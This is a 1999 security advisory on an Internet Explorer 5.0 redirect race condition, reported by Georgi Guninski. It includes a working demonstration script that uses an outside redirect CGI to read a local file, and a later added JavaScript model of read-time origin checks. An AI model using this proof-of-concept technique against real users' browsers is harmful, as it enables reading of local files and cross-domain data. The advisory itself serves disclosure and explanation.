IE 5.0 Vulnerable to HTTP Redirection

Reported November 4, 1999 by Georgi Guninski

VERSIONS AFFECTED
  • Microsoft Internet Explorer 5.0

DESCRIPTION

Georgi Guninski discovered a problem with Internet Explorer 5.0 under Windows 95 and NT 4.0 (and perhaps Windows 98) that allows a remote user to read local text and HTML files, as well as files from any domain. Other file types may be readable as well; window spoofing is also possible, as is, in some cases, reading files behind a firewall.

This vulnerability may be exploited using an HTML email message or a newsgroup posting.

The problem appears to be a race condition immediately after window.open("HTTP-redirecting-URL").

If you do:

     a=window.open("HTTP-redirecting-url");   // window is still on the original URL here
     b=a.document;                             // reference is taken before the redirect lands

Then you will have access to the redirected URL's document through "b".

DEMONSTRATION

<SCRIPT>
alert("Create short text file c:\\test.txt and it will be read and shown in a message box");
// Open a window on a URL that HTTP-redirects to file://c:/test.txt
a=window.open("http://www.nat.bg/~joro/reject.cgi?test.txt");
// Take the document reference before the redirect completes
b=a.document;
// Read it once the redirected (local) page has loaded
setTimeout("alert(b.body.innerText);",4000);
</SCRIPT>

NOTE: "http://www.nat.bg/~joro/reject.cgi?test.txt" just does an HTTP redirect to "file://c:/test.txt".
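The following is an added example, not part of the advisory and not IE's or Guninski's code. It models, in plain JavaScript (runnable under Node), the two ways a browser can decide whether script in one window may read another window's document: once at window.open() time from the requested URL (the behaviour the demonstration above relies on), or on every read from the URL the window actually holds after redirects have resolved. The WindowModel class, the function names and the opener URL are assumptions made for illustration; the CGI URL and redirect target are the ones from the advisory.

```javascript
// Added example (not from the advisory, not IE or Guninski's code): a minimal
// model of the origin check a browser must apply when script in one window
// reads another window's document. Class and function names are invented.

// Same-origin-policy origin of a URL: "scheme://host[:port]" for http(s),
// otherwise an opaque origin ("null") that never equals anything else.
// Unparsable input is treated as opaque too, so it can never match.
function originOf(urlString) {
  try {
    const u = new URL(urlString);
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.origin : 'null';
  } catch (e) {
    return 'null';
  }
}

// Two URLs are same-origin only if both origins are non-opaque and equal.
function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return oa !== 'null' && oa === ob;
}

// A window created by window.open(): it starts at the requested URL and may be
// moved elsewhere by HTTP redirects that resolve asynchronously.
class WindowModel {
  constructor(requestedUrl, redirectTargets = []) {
    this.requestedUrl = requestedUrl;
    this.currentUrl = requestedUrl;
    this.pendingRedirects = redirectTargets.slice();
  }
  // Simulate the network finishing: follow every queued redirect.
  completeNavigation() {
    while (this.pendingRedirects.length > 0) {
      this.currentUrl = this.pendingRedirects.shift();
    }
  }
}

// The behaviour the advisory describes: access is decided once, from the URL
// handed to window.open(), and the document reference stays usable after the
// redirect lands on a different origin or on a local file.
function accessDecidedAtOpen(openerUrl, win) {
  return sameOrigin(openerUrl, win.requestedUrl);
}

// The correct behaviour: each read through the reference re-checks the origin
// of the document that is loaded in the window at that moment.
function accessDecidedAtRead(openerUrl, win) {
  return sameOrigin(openerUrl, win.currentUrl);
}

// Walk through the advisory's scenario and report both decisions before and
// after the redirect resolves.
function demo() {
  const opener = 'http://www.nat.bg/~joro/';              // assumed page running the script
  const popup = new WindowModel(
    'http://www.nat.bg/~joro/reject.cgi?test.txt',          // same origin as the opener
    ['file://c:/test.txt']                                   // where the CGI redirects
  );
  const beforeRedirect = {
    atOpen: accessDecidedAtOpen(opener, popup),
    atRead: accessDecidedAtRead(opener, popup),
  };
  popup.completeNavigation();
  const afterRedirect = {
    atOpen: accessDecidedAtOpen(opener, popup),   // still true: the flaw
    atRead: accessDecidedAtRead(opener, popup),   // false: file: is opaque
  };
  return { beforeRedirect, afterRedirect, finalUrl: popup.currentUrl };
}

console.log(JSON.stringify(demo(), null, 2));
```

Before the redirect resolves both checks agree, because the popup really is on the opener's origin; afterwards only the read-time check denies access. The same sameOrigin() comparison also rejects a redirect to any other http host, which is the "files from any domain" case the description mentions.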

VENDOR RESPONSE

Microsoft is aware of the problem; however, no response has been issued as of midday on November 4, 1999.

CREDITS
Reported by
Georgi Guninski
Posted here at NTSecurity.NET on November 4, 1999